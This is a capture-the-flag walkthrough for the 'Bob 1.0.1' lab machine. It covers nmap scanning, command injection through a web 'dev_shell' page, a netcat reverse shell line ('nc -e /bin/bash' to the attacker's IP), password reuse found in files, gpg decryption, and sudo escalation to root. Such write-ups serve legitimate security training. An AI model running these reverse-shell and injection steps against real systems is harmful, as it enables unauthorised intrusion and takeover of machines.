# Bob 1.0.1 ## Enumeration ### nmap ``` nmap -sC -sV -oA nmap/Bob 192.168.1.112 ``` ``` Starting Nmap 7.80 ( https://nmap.org ) at 2020-05-19 22:59 EDT Stats: 0:00:01 elapsed; 0 hosts completed (0 up), 0 undergoing Script Pre-Scan NSE Timing: About 0.00% done Nmap scan report for 192.168.1.112 Host is up (0.00014s latency). Not shown: 999 closed ports PORT STATE SERVICE VERSION 80/tcp open http Apache httpd 2.4.25 ((Debian)) | http-robots.txt: 4 disallowed entries | /login.php /dev_shell.php /lat_memo.html |_/passwords.html |_http-server-header: Apache/2.4.25 (Debian) |_http-title: Site doesn't have a title (text/html). MAC Address: 00:0C:29:3B:96:26 (VMware) Service detection performed. Please report any incorrect results at https://nmap.org/submit/ . Nmap done: 1 IP address (1 host up) scanned in 8.57 seconds ``` We see that there is only port 80 open and some disallow entries Let's put it at the browser see what we got ![](https://1595701629-files.gitbook.io/~/files/v0/b/gitbook-legacy-files/o/assets%2F-M6jqZqh8dnhmWJDpTuf%2F-M7lCINr34L9XsTyb0Qr%2F-M7lDjALQ-BJ4M08YLun%2Fimage.png?alt=media\&token=177195a6-a67b-44d0-b793-60471f3c69cc) Got this. ## Exploitation Then I navigate to `/dev_shell.php` ![](https://1595701629-files.gitbook.io/~/files/v0/b/gitbook-legacy-files/o/assets%2F-M6jqZqh8dnhmWJDpTuf%2F-M7lCINr34L9XsTyb0Qr%2F-M7lDsIL7e8wcRhzmdUp%2Fimage.png?alt=media\&token=db03be76-3e76-40c6-abb4-c0b6d9f01a3a) Got this shell, tried `ping 192.168.1.113` and `; ping 102.168.1.113` and got this error ![](https://1595701629-files.gitbook.io/~/files/v0/b/gitbook-legacy-files/o/assets%2F-M6jqZqh8dnhmWJDpTuf%2F-M7lCINr34L9XsTyb0Qr%2F-M7lEn9ceB8veW6oVr2o%2Fimage.png?alt=media\&token=b44513a8-c9ba-4416-8b08-71f710515b35) After a few tries, found out id can be used, so I went to try to set up a listener ![](https://1595701629-files.gitbook.io/~/files/v0/b/gitbook-legacy-files/o/assets%2F-M6jqZqh8dnhmWJDpTuf%2F-M7lCINr34L9XsTyb0Qr%2F-M7lFJzPmCjSPYOVe4cK%2Fimage.png?alt=media\&token=592ff6d5-08cd-457d-95af-ba51193849e2) ### Reverse Shell At our machine, type ``` nc -nlvp 4444 ``` At the `dev_shell`, type ``` id | nc -e /bin/bash 192.168.1.113 4444 ``` Then we will receive a shell, from there, type ``` python -c 'import pty; pty.spawn("/bin/bash")' ``` ![](https://1595701629-files.gitbook.io/~/files/v0/b/gitbook-legacy-files/o/assets%2F-M6jqZqh8dnhmWJDpTuf%2F-M7lCINr34L9XsTyb0Qr%2F-M7lH3qoW4IWkokpTv7g%2Fimage.png?alt=media\&token=690127b6-464b-481a-841b-12736974a279) Then navigate to the /home directory and we will see 4 directory `bob`, `elliot`, `jc` and `seb` ![](https://1595701629-files.gitbook.io/~/files/v0/b/gitbook-legacy-files/o/assets%2F-M6jqZqh8dnhmWJDpTuf%2F-M7lCINr34L9XsTyb0Qr%2F-M7lHBTXH8kXpy4_aXUy%2Fimage.png?alt=media\&token=1ae36b04-90ee-4a9f-b139-acfe30376549) I first went to the elliot directory and saw a file called `theadminisdumb.txt` ![](https://1595701629-files.gitbook.io/~/files/v0/b/gitbook-legacy-files/o/assets%2F-M6jqZqh8dnhmWJDpTuf%2F-M7lCINr34L9XsTyb0Qr%2F-M7lJLqnaDhYpLOcOEVH%2Fimage.png?alt=media\&token=8d7cd35b-b75d-49ef-a43c-2186d0bca9d5) After `cat` the file ![](https://1595701629-files.gitbook.io/~/files/v0/b/gitbook-legacy-files/o/assets%2F-M6jqZqh8dnhmWJDpTuf%2F-M7lCINr34L9XsTyb0Qr%2F-M7lK4fDkIhv9Eiy0IOd%2Fimage.png?alt=media\&token=63d2afc1-a936-4a44-9a1f-a69287a14a82) We can see that there is a password `Qwerty` for a user, after `su` to other 3 users, we know that the user is for `jc`. The password `theadminisdumb` is for `elliot`. `su` into `elliot` ![](https://1595701629-files.gitbook.io/~/files/v0/b/gitbook-legacy-files/o/assets%2F-M6jqZqh8dnhmWJDpTuf%2F-M7lCINr34L9XsTyb0Qr%2F-M7lNIWyrgn-hT96GQrW%2Fimage.png?alt=media\&token=7d5a4d18-6630-4f37-bfd7-daaad4756a38) I can't find anything on those users, so I went to bob user to find any interesting, after looking around I navigate to `/Documents` and saw 2 text files and a directory ![](https://1595701629-files.gitbook.io/~/files/v0/b/gitbook-legacy-files/o/assets%2F-M6jqZqh8dnhmWJDpTuf%2F-M7lCINr34L9XsTyb0Qr%2F-M7lNbLSmssZTUdsVuaV%2Fimage.png?alt=media\&token=0a82bfd6-ea11-4bde-92cc-7155a598335c) Going inside the `/Secret/Keep_out/Not_Porn/No_Lookie_In_Here`, there is a `notes.sh` ![](https://1595701629-files.gitbook.io/~/files/v0/b/gitbook-legacy-files/o/assets%2F-M6jqZqh8dnhmWJDpTuf%2F-M7lCINr34L9XsTyb0Qr%2F-M7lNpubCnoZnolm2XDE%2Fimage.png?alt=media\&token=31139d63-a027-4341-ae92-749f9cfbbcd5) `Cat` the file, after that the first character of each sentence is HARPOCRATES, it must be indicates a password ![](https://1595701629-files.gitbook.io/~/files/v0/b/gitbook-legacy-files/o/assets%2F-M6jqZqh8dnhmWJDpTuf%2F-M7lCINr34L9XsTyb0Qr%2F-M7lNuFL0ChLUwbt9UKh%2Fimage.png?alt=media\&token=3a2a4efd-998b-46d7-9fa6-dcdddfaa9937) I went back tot he `Document` directory ![](https://1595701629-files.gitbook.io/~/files/v0/b/gitbook-legacy-files/o/assets%2F-M6jqZqh8dnhmWJDpTuf%2F-M7lCINr34L9XsTyb0Qr%2F-M7lNxwEXjGzrbbCNSig%2Fimage.png?alt=media\&token=e6445fbd-d636-4dc6-942c-d788b21aab97) We can see there is a login.txt.gpg, use the string we got just now we might decrypt the file. ``` gpg --batch --passphrase HARPOCRATES -d login.txt.gpg ``` ![](https://1595701629-files.gitbook.io/~/files/v0/b/gitbook-legacy-files/o/assets%2F-M6jqZqh8dnhmWJDpTuf%2F-M7lCINr34L9XsTyb0Qr%2F-M7lO10ixLrtEX6lQ4s3%2Fimage.png?alt=media\&token=ff829d40-b3ab-4db3-bd41-b440036583dc) We can see that a credentials has been decrypted! and it is `bob` credentials ## Privilege Escalation Lets `su` into `bob` ![](https://1595701629-files.gitbook.io/~/files/v0/b/gitbook-legacy-files/o/assets%2F-M6jqZqh8dnhmWJDpTuf%2F-M7lCINr34L9XsTyb0Qr%2F-M7lOEpYkp0SQqmiNKBd%2Fimage.png?alt=media\&token=e79bb9d5-a5a0-4cbf-806d-9dab6a4d8b96) type `sudo -l` ![](https://1595701629-files.gitbook.io/~/files/v0/b/gitbook-legacy-files/o/assets%2F-M6jqZqh8dnhmWJDpTuf%2F-M7lCINr34L9XsTyb0Qr%2F-M7lOMYYYJzNHA5yNoyj%2Fimage.png?alt=media\&token=1c1cbffa-b137-431a-bd95-d3e68f91da99) We can see it has sudo rights for this user type `sudo bash` and we will get root ![](https://1595701629-files.gitbook.io/~/files/v0/b/gitbook-legacy-files/o/assets%2F-M6jqZqh8dnhmWJDpTuf%2F-M7lCINr34L9XsTyb0Qr%2F-M7lOiXM32hz1VlzLpiT%2Fimage.png?alt=media\&token=93c2281b-e54f-45ae-9d7e-6e3e8b0ffee8) type `/flag.txt` and we will get the flag ![](https://1595701629-files.gitbook.io/~/files/v0/b/gitbook-legacy-files/o/assets%2F-M6jqZqh8dnhmWJDpTuf%2F-M7lCINr34L9XsTyb0Qr%2F-M7lPAx15BwKHMH2yIYi%2Fimage.png?alt=media\&token=576cdb51-b22a-4b4a-b9b9-161c2488f157) Congratulation!